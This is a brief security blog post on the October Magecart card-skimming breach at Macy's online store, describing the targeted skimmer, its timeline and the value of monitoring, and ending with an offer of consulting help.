Macy’s online store was attacked in October, resulting in a breach of credit card information for a “small” number of customers. Macy’s chose not to define small – possibly they don’t really know. Macy’s says that the attack was live only for a week, which says something positive for their security monitoring and alerting system. The good news for Macy’s, if there is any good news in a breach, is that it happened BEFORE the California Consumer Privacy Act came into force, otherwise, since California customers have a private right of action under that law, in case of a breach, without having to show specific harm, the breach could have gotten a lot more expensive than it already will be (see breach announcement here).
The basics of the breach are typical of one of the many Magecart skimming breaches. An unauthorized person inserted malicious code into the Macy’s web site that captured credit card information and sent it to the hacker.
The first problem, of course, is how did someone get access to insert unauthorized code, but again, that is a normal issue with all of the thousands of Magecart attacks. Sometimes hackers do this by infecting third party libraries that the target web site uses. That does not appear to be the case here. Likely, either they found a security vulnerability, which can take a lot of time, or they compromised a web site admin’s credentials through a phishing attack.
What is different about this credit card skimmer is that the attackers spent significant time researching how Macy’s web site worked and only inserted the code on two areas – to decrease the likelihood of being detected.
The first area is the web site credit card wallet page. Since the credit card digits are typically masked on the wallet page, these hackers only hooked into the pages that allow a customer to add a new card, delete a card or edit a card. This code would only work on MACYS.COM. RiskIQ says this is a new attack vector.
The second place they attacked is the new account registration page. This allows them to steal a user’s credentials in addition to a credit card.
This was a very targeted attack. The web site the credentials were sent to was created on September 24th, the code injected on October 7th and the code disabled on October 15th. The total lifetime was about three weeks.
They even flagged the data for where it came from: guest checkout, new user registration or wallet page.
The fact that they were willing to spend enough time to figure out what the targets of opportunity were, customize the code to work for this one site and then target the site for a blitz-style attack means that the attack is very profitable.
Is this the next phase these attacks are moving to? Possibly.
The fact that Macy’s was able to detect this so quickly means that their monitoring and alerting solution was quite effective because if they waited for these cards to show up on the black market, it could have taken 30 days or longer.
How good is your alerting and monitoring solution? If you need help with setting up a cost effective one, contact us. Source: CSO Online